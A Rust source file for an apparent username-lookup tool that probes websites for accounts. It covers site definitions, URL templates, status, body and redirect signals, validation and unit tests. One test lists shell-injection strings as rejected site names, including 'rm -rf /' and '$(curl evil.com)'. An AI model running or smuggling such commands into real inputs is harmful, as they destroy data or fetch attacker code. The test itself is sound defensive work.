use std::fmt;
use serde::{Deserialize, Serialize};
use crate::check::MatchKind;
use crate::error::{Error, Result};
use crate::username::Username;
/// Definition of a single site, (de)serialized through serde.
///
/// Every field except `name` and `url` is optional in the input: collections
/// default to empty and options to `None`, and empty/`None` values are left
/// out again when serializing.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Site {
/// Site name. `Site::validate` requires it to be non-blank, no longer than
/// `NAME_MAX_LEN`, and to pass `is_safe_site_name`.
pub name: String,
/// URL template; `UrlTemplate::new` guarantees it contains the `{username}`
/// placeholder and starts with `http://` or `https://`.
pub url: UrlTemplate,
/// Signals evaluated for this site. `Site::validate` rejects an empty list;
/// `Engine::merge_into` copies the engine's signals in when this is empty.
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub signals: Vec<Signal>,
/// One or more usernames; `Site::validate` rejects an empty list or a blank
/// entry. Presumably accounts known to exist on the site — TODO confirm
/// against the code that consumes this field.
#[serde(default, skip_serializing_if = "Option::is_none")]
pub known_present: Option<KnownPresent>,
/// Not inspected by `Site::validate`. Presumably a username known NOT to
/// exist on the site — TODO confirm against the consumer.
#[serde(default, skip_serializing_if = "Option::is_none")]
pub known_absent: Option<String>,
/// Extractors; `Site::validate` checks each has a non-blank field name and a
/// selector that `scraper::Selector::parse` accepts.
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub extract: Vec<Extractor>,
/// Free-form tags; `Site::validate` rejects blank entries.
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub tags: Vec<String>,
/// Header name -> value map. `Engine::merge_into` adds engine headers whose
/// names are not already present here. Presumably sent with the probe
/// request — the request code is not in this file.
#[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
pub request_headers: std::collections::BTreeMap<String, String>,
/// Regex pattern described as a "username-gate" by the warning in
/// `Site::validate`; a pattern that fails to compile only logs a warning
/// there and does not fail validation.
#[serde(default, skip_serializing_if = "Option::is_none")]
pub regex_check: Option<String>,
/// Presumably the name of the `Engine` whose defaults this site inherits;
/// the lookup is not performed in this file — TODO confirm.
#[serde(default, skip_serializing_if = "Option::is_none")]
pub engine: Option<String>,
}
/// Shared defaults that `Engine::merge_into` copies into a `Site` wherever the
/// site did not set its own value.
///
/// All fields are optional in the input and omitted from serialized output
/// when empty or `None`.
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[non_exhaustive]
pub struct Engine {
/// Signals handed to a site whose own `signals` list is empty.
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub signals: Vec<Signal>,
/// Headers added to a site for every header name the site does not define.
#[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
pub request_headers: std::collections::BTreeMap<String, String>,
/// Regex pattern handed to a site whose own `regex_check` is `None`.
#[serde(default, skip_serializing_if = "Option::is_none")]
pub regex_check: Option<String>,
}
impl Engine {
    /// Checks that this engine definition is usable.
    ///
    /// `name` is the engine's name; it is only checked for blankness and used
    /// to label error and log messages.
    ///
    /// # Errors
    ///
    /// Returns `Error::InvalidSite` when `name` is blank or when any signal
    /// fails its own validation. A `regex_check` pattern that does not compile
    /// is *not* an error: it is logged as a warning and validation continues.
    pub fn validate(&self, name: &str) -> Result<()> {
        if name.trim().is_empty() {
            return Err(Error::InvalidSite {
                reason: "engine name is empty".into(),
            });
        }

        // Stop at the first malformed signal and report it under the engine name.
        self.signals.iter().try_for_each(|signal| {
            signal.validate().map_err(|reason| Error::InvalidSite {
                reason: format!("engine {name:?}: {reason}"),
            })
        })?;

        // An uncompilable pattern is tolerated; it is only surfaced in the log.
        if let Some(pat) = self.regex_check.as_ref() {
            if let Some(err) = regex::Regex::new(pat).err() {
                tracing::warn!(
                    engine = %name, pattern = %pat, error = %err,
                    "engine regex_check did not compile; gate disabled for inheriting sites",
                );
            }
        }

        Ok(())
    }

    /// Fills in the parts of `site` that it left unset with this engine's values.
    ///
    /// * `regex_check` is copied only when the site has none.
    /// * `signals` are copied only when the site's list is empty.
    /// * each engine header is added only if the site has no header of that
    ///   name; headers the site already defines are left untouched.
    pub fn merge_into(&self, site: &mut Site) {
        if site.regex_check.is_none() {
            site.regex_check.clone_from(&self.regex_check);
        }

        if site.signals.is_empty() {
            site.signals.clone_from(&self.signals);
        }

        for (header, value) in self.request_headers.iter() {
            site.request_headers
                .entry(header.clone())
                .or_insert_with(|| value.clone());
        }
    }
}
/// One username or a list of usernames.
///
/// The enum is `#[serde(untagged)]`, so the serialized form is either a bare
/// string (`Single`) or an array of strings (`Multiple`).
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
#[non_exhaustive]
pub enum KnownPresent {
/// Exactly one username.
Single(String),
/// A list of usernames; may be empty as far as this type is concerned
/// (`Site::validate` rejects the empty case).
Multiple(Vec<String>),
}
impl KnownPresent {
    /// Views the contained username(s) as a slice, regardless of variant.
    ///
    /// `Single` yields a one-element slice; `Multiple` yields the list as is.
    pub fn as_slice(&self) -> &[String] {
        match self {
            Self::Multiple(names) => &names[..],
            Self::Single(name) => std::slice::from_ref(name),
        }
    }

    /// Returns the first username, or `None` when the list is empty.
    pub fn primary(&self) -> Option<&str> {
        match self.as_slice() {
            [first, ..] => Some(first.as_str()),
            [] => None,
        }
    }
}
impl From<&str> for KnownPresent {
fn from(s: &str) -> Self {
Self::Single(s.to_owned())
}
}
impl From<String> for KnownPresent {
fn from(s: String) -> Self {
Self::Single(s)
}
}
/// Maximum site-name length accepted by `Site::validate`.
const NAME_MAX_LEN: usize = 80;
/// Tells whether `name` uses only the characters allowed in a site name.
///
/// The first character must be an ASCII letter, ASCII digit or `_`. Every
/// following character must be one of those, a space, or one of `.()!/+-`.
/// An empty string is not a safe name.
fn is_safe_site_name(name: &str) -> bool {
    /// ASCII letters, ASCII digits and underscore.
    fn is_word(c: char) -> bool {
        c.is_ascii_alphanumeric() || c == '_'
    }

    // Characters allowed after the first position, in addition to word chars.
    const EXTRA: &str = " .()!/+-";

    let mut rest = name.chars();
    let starts_with_word = rest.next().map_or(false, is_word);
    starts_with_word && rest.all(|c| is_word(c) || EXTRA.contains(c))
}
/// One extraction rule attached to a `Site`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Extractor {
/// Name of the extracted field; `Site::validate` rejects a blank name.
pub field: String,
/// CSS selector; `Site::validate` rejects it unless
/// `scraper::Selector::parse` accepts it.
pub selector: String,
/// Optional, omitted from serialized output when `None`. Presumably the
/// element attribute to read instead of the element text — TODO confirm
/// against the extraction code, which is not in this file.
#[serde(default, skip_serializing_if = "Option::is_none")]
pub attr: Option<String>,
}
impl Site {
    /// Returns the URL for `username`, produced by substituting the username
    /// into this site's URL template.
    pub fn url_for(&self, username: &Username) -> String {
        self.url.substitute(username.as_str())
    }

    /// Checks that this site definition is well formed.
    ///
    /// Checks run in the order below and the first failure is returned:
    ///
    /// 1. the name is not blank;
    /// 2. the name is at most `NAME_MAX_LEN` characters long;
    /// 3. the name passes `is_safe_site_name`;
    /// 4. there is at least one signal, and every signal is valid;
    /// 5. every extractor has a non-blank field name and a parseable CSS
    ///    selector;
    /// 6. `known_present`, when set, is non-empty and has no blank username;
    /// 7. no tag is blank.
    ///
    /// A `regex_check` pattern that does not compile is only logged as a
    /// warning; it never fails validation.
    ///
    /// # Errors
    ///
    /// Returns `Error::InvalidSite` with a human-readable `reason` for the
    /// first check that fails.
    pub fn validate(&self) -> Result<()> {
        if self.name.trim().is_empty() {
            return Err(Error::InvalidSite {
                reason: "site name is empty".into(),
            });
        }
        // Count characters, not UTF-8 bytes: the message below speaks of
        // "chars", and a short non-ASCII name must fall through to the
        // character-set check instead of being reported as over-long.
        if self.name.chars().count() > NAME_MAX_LEN {
            return Err(Error::InvalidSite {
                reason: format!(
                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
                    self.name
                ),
            });
        }
        if !is_safe_site_name(&self.name) {
            return Err(Error::InvalidSite {
                reason: format!(
                    "site name {:?} contains characters outside the allowed \
                     set (word chars, space, `.()!/+-`)",
                    self.name
                ),
            });
        }

        if self.signals.is_empty() {
            return Err(Error::InvalidSite {
                reason: format!("site {:?}: signals list is empty", self.name),
            });
        }
        for signal in &self.signals {
            signal.validate().map_err(|reason| Error::InvalidSite {
                reason: format!("site {:?}: {reason}", self.name),
            })?;
        }

        for extractor in &self.extract {
            if extractor.field.trim().is_empty() {
                return Err(Error::InvalidSite {
                    reason: format!("site {:?}: extractor has an empty field name", self.name),
                });
            }
            if scraper::Selector::parse(&extractor.selector).is_err() {
                return Err(Error::InvalidSite {
                    reason: format!(
                        "site {:?}: invalid CSS selector {:?} for field {:?}",
                        self.name, extractor.selector, extractor.field
                    ),
                });
            }
        }

        // Deliberately lenient: a pattern the `regex` crate cannot compile is
        // reported in the log and the site is still accepted.
        if let Some(pat) = &self.regex_check {
            if let Err(err) = regex::Regex::new(pat) {
                tracing::warn!(
                    site = %self.name, pattern = %pat, error = %err,
                    "regex_check did not compile; username-gate disabled for this site",
                );
            }
        }

        if let Some(kp) = &self.known_present {
            let names = kp.as_slice();
            if names.is_empty() {
                return Err(Error::InvalidSite {
                    reason: format!("site {:?}: known_present is an empty list", self.name),
                });
            }
            if names.iter().any(|name| name.trim().is_empty()) {
                return Err(Error::InvalidSite {
                    reason: format!(
                        "site {:?}: known_present contains an empty username",
                        self.name
                    ),
                });
            }
        }

        if self.tags.iter().any(|tag| tag.trim().is_empty()) {
            return Err(Error::InvalidSite {
                reason: format!("site {:?}: tag is empty", self.name),
            });
        }

        Ok(())
    }
}
/// URL template string wrapped in a newtype.
///
/// The inner field is private; `UrlTemplate::new` (also used by the
/// `Deserialize` impl) only accepts strings that contain the `{username}`
/// placeholder and start with `http://` or `https://`.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);
/// Token that `UrlTemplate::new` requires in every template and that
/// `UrlTemplate::substitute` replaces with the username.
const PLACEHOLDER: &str = "{username}";
impl UrlTemplate {
pub fn new(template: impl Into<String>) -> Result<Self> {
let t = template.into();
if !t.contains(PLACEHOLDER) {
return Err(Error::InvalidSite {
reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
});
}
if !(t.starts_with("http://") || t.starts_with("https://")) {
return Err(Error::InvalidSite {
reason: format!("url template must start with http(s)://: {t:?}"),
});
}
Ok(Self(t))
}
fn substitute(&self, username: &str) -> String {
self.0.replace(PLACEHOLDER, username)
}
pub fn as_str(&self) -> &str {
&self.0
}
}
impl fmt::Display for UrlTemplate {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.write_str(&self.0)
}
}
/// Serializes the template as a plain string.
impl Serialize for UrlTemplate {
    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
        s.serialize_str(self.0.as_str())
    }
}
impl<'de> Deserialize<'de> for UrlTemplate {
fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
let raw = String::deserialize(d)?;
Self::new(raw).map_err(serde::de::Error::custom)
}
}
/// A single rule that inspects a `Probe` and casts a vote (see
/// `Signal::evaluate`).
///
/// Serialized as an internally tagged object: the variant goes in a `kind`
/// field using snake_case (e.g. `"status_found"`), next to the variant's own
/// fields.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "kind", rename_all = "snake_case")]
#[non_exhaustive]
pub enum Signal {
/// Votes `Found` when the probe status is one of `codes`.
StatusFound {
codes: Vec<u16>,
},
/// Votes `NotFound` when the probe status is one of `codes`.
StatusNotFound {
codes: Vec<u16>,
},
/// Votes `Found` when the probe body contains `text`.
BodyPresent {
text: String,
},
/// Votes `NotFound` when the probe body contains `text`.
BodyAbsent {
text: String,
},
/// Votes `NotFound` when the probe's final URL contains `fragment`.
RedirectAbsent {
fragment: String,
},
}
/// The response facts a `Signal` is evaluated against.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
/// Status code, matched against the `codes` of the status signals and shown
/// as `HTTP <status>` by `Signal::describe_match`.
pub(crate) status: u16,
/// URL searched for the `RedirectAbsent` fragment. Presumably the URL after
/// redirects were followed — the code that fills it is not in this file.
pub(crate) final_url: &'a str,
/// Text searched by the `BodyPresent` / `BodyAbsent` signals.
pub(crate) body: &'a str,
}
/// Vote produced by evaluating one `Signal`; `aggregate` combines the votes.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
/// The signal's condition matched and it votes "found".
Found,
/// The signal's condition matched and it votes "not found".
NotFound,
/// The signal's condition did not match; it casts no vote.
Ambiguous,
}
impl Signal {
    /// Reports whether evaluating this signal reads the probe body; only the
    /// two body variants do.
    pub(crate) fn needs_body(&self) -> bool {
        match self {
            Self::BodyPresent { .. } | Self::BodyAbsent { .. } => true,
            Self::StatusFound { .. }
            | Self::StatusNotFound { .. }
            | Self::RedirectAbsent { .. } => false,
        }
    }

    /// Evaluates this signal against `probe`.
    ///
    /// Each variant has one condition and one vote it casts when the
    /// condition holds; when the condition does not hold the result is always
    /// `SignalVerdict::Ambiguous`.
    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
        let (fired, vote) = match self {
            Self::StatusFound { codes } => {
                (codes.contains(&probe.status), SignalVerdict::Found)
            }
            Self::StatusNotFound { codes } => {
                (codes.contains(&probe.status), SignalVerdict::NotFound)
            }
            Self::BodyPresent { text } => {
                (probe.body.contains(text.as_str()), SignalVerdict::Found)
            }
            Self::BodyAbsent { text } => {
                (probe.body.contains(text.as_str()), SignalVerdict::NotFound)
            }
            Self::RedirectAbsent { fragment } => (
                probe.final_url.contains(fragment.as_str()),
                SignalVerdict::NotFound,
            ),
        };

        if fired {
            vote
        } else {
            SignalVerdict::Ambiguous
        }
    }

    /// Produces a short human-readable description of what this signal
    /// matched on, tagged with the signal kind in parentheses.
    ///
    /// The text is built unconditionally; it does not check whether the
    /// signal actually fired for `probe`.
    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
        match self {
            Self::StatusFound { .. } => {
                format!("HTTP {} (status_found)", probe.status)
            }
            Self::StatusNotFound { .. } => {
                format!("HTTP {} (status_not_found)", probe.status)
            }
            Self::BodyPresent { text } => {
                format!("body contains {text:?} (body_present)")
            }
            Self::BodyAbsent { text } => {
                format!("body contains {text:?} (body_absent)")
            }
            Self::RedirectAbsent { fragment } => {
                format!("final URL contains {fragment:?} (redirect_absent)")
            }
        }
    }

    /// Rejects signals whose payload is empty (no status codes, empty body
    /// text, or empty URL fragment), returning the complaint as a `String`.
    fn validate(&self) -> std::result::Result<(), String> {
        let (payload_is_empty, complaint) = match self {
            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
                (codes.is_empty(), "status signal codes list is empty")
            }
            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
                (text.is_empty(), "body signal text is empty")
            }
            Self::RedirectAbsent { fragment } => {
                (fragment.is_empty(), "redirect signal fragment is empty")
            }
        };

        if payload_is_empty {
            Err(complaint.into())
        } else {
            Ok(())
        }
    }
}
/// Combines per-signal votes into one `MatchKind`.
///
/// Any `NotFound` vote wins; otherwise any `Found` vote wins; with neither
/// (including an empty input) the result is `MatchKind::Uncertain`.
/// The whole iterator is always consumed.
pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
where
    I: IntoIterator<Item = SignalVerdict>,
{
    let (saw_found, saw_not_found) =
        verdicts
            .into_iter()
            .fold((false, false), |(found, not_found), vote| match vote {
                SignalVerdict::Found => (true, not_found),
                SignalVerdict::NotFound => (found, true),
                SignalVerdict::Ambiguous => (found, not_found),
            });

    match (saw_not_found, saw_found) {
        (true, _) => MatchKind::NotFound,
        (false, true) => MatchKind::Found,
        (false, false) => MatchKind::Uncertain,
    }
}
// Unit tests for site validation, URL templates, signal evaluation and vote
// aggregation.
#[cfg(test)]
mod tests {
use super::*;
// Builds a minimal `Site` named "Example" with the given signals and every
// optional field left empty / `None`.
fn site_with(signals: Vec<Signal>) -> Site {
Site {
name: "Example".into(),
url: UrlTemplate::new("https://example.com/{username}").unwrap(),
signals,
known_present: None,
known_absent: None,
extract: Vec::new(),
tags: Vec::new(),
request_headers: std::collections::BTreeMap::new(),
regex_check: None,
engine: None,
}
}
// `url_for` replaces the placeholder with the username.
#[test]
fn url_template_substitutes_placeholder() {
let user = Username::new("alice").unwrap();
let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
assert_eq!(site.url_for(&user), "https://example.com/alice");
}
// A template without `{username}` is rejected.
#[test]
fn url_template_rejects_missing_placeholder() {
assert!(UrlTemplate::new("https://example.com/users/").is_err());
}
// Only http:// and https:// templates are accepted.
#[test]
fn url_template_rejects_bad_scheme() {
assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
}
// A site with no signals fails validation.
#[test]
fn validate_requires_non_empty_signals() {
let err = site_with(vec![]).validate().unwrap_err();
assert!(err.to_string().contains("signals list is empty"));
}
// A status signal with no codes fails validation.
#[test]
fn validate_rejects_empty_status_codes() {
let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
.validate()
.unwrap_err();
assert!(err.to_string().contains("status signal"));
}
// A body signal with empty text fails validation.
#[test]
fn validate_rejects_empty_body_text() {
let err = site_with(vec![Signal::BodyAbsent {
text: String::new(),
}])
.validate()
.unwrap_err();
assert!(err.to_string().contains("body signal"));
}
// A redirect signal with an empty fragment fails validation.
#[test]
fn validate_rejects_empty_redirect_fragment() {
let err = site_with(vec![Signal::RedirectAbsent {
fragment: String::new(),
}])
.validate()
.unwrap_err();
assert!(err.to_string().contains("redirect signal"));
}
// Names containing quote, `$`, backtick, backslash, `|`, `;`, `&`, `<` or `>`
// must be rejected by the character-set check specifically.
#[test]
fn validate_rejects_shell_metacharacters_in_name() {
for bad in [
"Foo\"; rm -rf /; #",
"Bar$(curl evil.com)",
"Baz`whoami`",
"Qux\\nfoo",
"back\\slash",
"pipe|ish",
"semi;colon",
"amp&and",
"lt<gt>",
] {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.name = bad.into();
let err = s.validate().unwrap_err();
assert!(
err.to_string()
.contains("characters outside the allowed set"),
"expected unsafe-name rejection for {bad:?}, got {err}",
);
}
}
// Names with spaces, parentheses, `/`, `!` and `.` must keep validating.
#[test]
fn validate_accepts_real_world_site_names() {
for ok in [
"GitHub",
"Steam Community (User)",
"X / Twitter",
"osu!",
"Eintracht Frankfurt Forum",
"Archive of Our Own",
"Career.habr",
"fl",
"GitLab.com",
"Sbazar.cz",
] {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.name = ok.into();
assert!(s.validate().is_ok(), "expected {ok:?} to validate");
}
}
// A 100-character name exceeds the length limit.
#[test]
fn validate_rejects_overlong_name() {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.name = "A".repeat(100);
let err = s.validate().unwrap_err();
assert!(err.to_string().contains("longer than"));
}
// A compilable `regex_check` pattern passes validation.
#[test]
fn validate_accepts_well_formed_regex_check() {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
assert!(s.validate().is_ok());
}
// A pattern using lookaround must not make validation fail; the site is
// still accepted.
#[test]
fn validate_tolerates_unsupported_regex_features() {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
assert!(
s.validate().is_ok(),
"lookaround-bearing regex should warn, not reject the site"
);
}
// `StatusFound` votes Found on a listed code and abstains otherwise.
#[test]
fn signal_status_found_votes_only_on_match() {
let signal = Signal::StatusFound { codes: vec![200] };
let probe = Probe {
status: 200,
final_url: "https://example.com/alice",
body: "",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
let probe = Probe {
status: 404,
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
// `StatusNotFound` votes NotFound on a listed code and abstains otherwise.
#[test]
fn signal_status_not_found_votes_only_on_match() {
let signal = Signal::StatusNotFound { codes: vec![404] };
let probe = Probe {
status: 404,
final_url: "",
body: "",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
let probe = Probe {
status: 200,
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
// `BodyAbsent` votes NotFound when its text IS in the body and abstains when
// the text is missing.
#[test]
fn signal_body_absent_votes_not_found_when_text_present() {
let signal = Signal::BodyAbsent {
text: "Profile not found".into(),
};
let probe = Probe {
status: 200,
final_url: "",
body: "<h1>Profile not found</h1>",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
let probe = Probe {
body: "<h1>Welcome alice</h1>",
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
// `RedirectAbsent` looks at `final_url`, not at the body or status.
#[test]
fn signal_redirect_absent_inspects_final_url() {
let signal = Signal::RedirectAbsent {
fragment: "/login".into(),
};
let probe = Probe {
status: 200,
final_url: "https://example.com/login?next=/alice",
body: "",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
let probe = Probe {
final_url: "https://example.com/alice",
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
// Found + abstention aggregates to Found.
#[test]
fn aggregate_found_when_only_found_signals_fire() {
let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
assert_eq!(kind, MatchKind::Found);
}
// NotFound + abstention aggregates to NotFound.
#[test]
fn aggregate_not_found_when_only_not_found_signals_fire() {
let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
assert_eq!(kind, MatchKind::NotFound);
}
// A NotFound vote overrides a Found vote.
#[test]
fn aggregate_not_found_wins_over_found() {
let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
assert_eq!(kind, MatchKind::NotFound);
}
// Only abstentions aggregate to Uncertain.
#[test]
fn aggregate_uncertain_when_no_signals_fire() {
let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
assert_eq!(kind, MatchKind::Uncertain);
}
// No votes at all aggregate to Uncertain.
#[test]
fn aggregate_empty_is_uncertain() {
let kind = aggregate(std::iter::empty());
assert_eq!(kind, MatchKind::Uncertain);
}
// Only the two body variants report that they need the body.
#[test]
fn needs_body_is_true_only_for_body_signals() {
assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
assert!(
!Signal::RedirectAbsent {
fragment: "/login".into()
}
.needs_body()
);
assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
}
// A JSON site with `kind`-tagged signals deserializes and validates; the
// omitted optional fields fall back to their defaults.
#[test]
fn deserializes_signal_list() {
let json = r#"{
"name": "GitHub",
"url": "https://github.com/{username}",
"signals": [
{ "kind": "status_found", "codes": [200] },
{ "kind": "status_not_found", "codes": [404] }
]
}"#;
let site: Site = serde_json::from_str(json).unwrap();
assert_eq!(site.name, "GitHub");
assert_eq!(site.signals.len(), 2);
site.validate().unwrap();
}
// Property test: for any list of 0..16 votes, `aggregate` agrees with the
// "NotFound beats Found beats Uncertain" rule computed independently.
proptest::proptest! {
#[test]
fn aggregate_matches_negative_priority_spec(
votes in proptest::collection::vec(
proptest::prop_oneof![
proptest::strategy::Just(SignalVerdict::Found),
proptest::strategy::Just(SignalVerdict::NotFound),
proptest::strategy::Just(SignalVerdict::Ambiguous),
],
0..16,
),
) {
let kind = aggregate(votes.iter().copied());
let expected = if votes.contains(&SignalVerdict::NotFound) {
MatchKind::NotFound
} else if votes.contains(&SignalVerdict::Found) {
MatchKind::Found
} else {
MatchKind::Uncertain
};
proptest::prop_assert_eq!(kind, expected);
}
}
}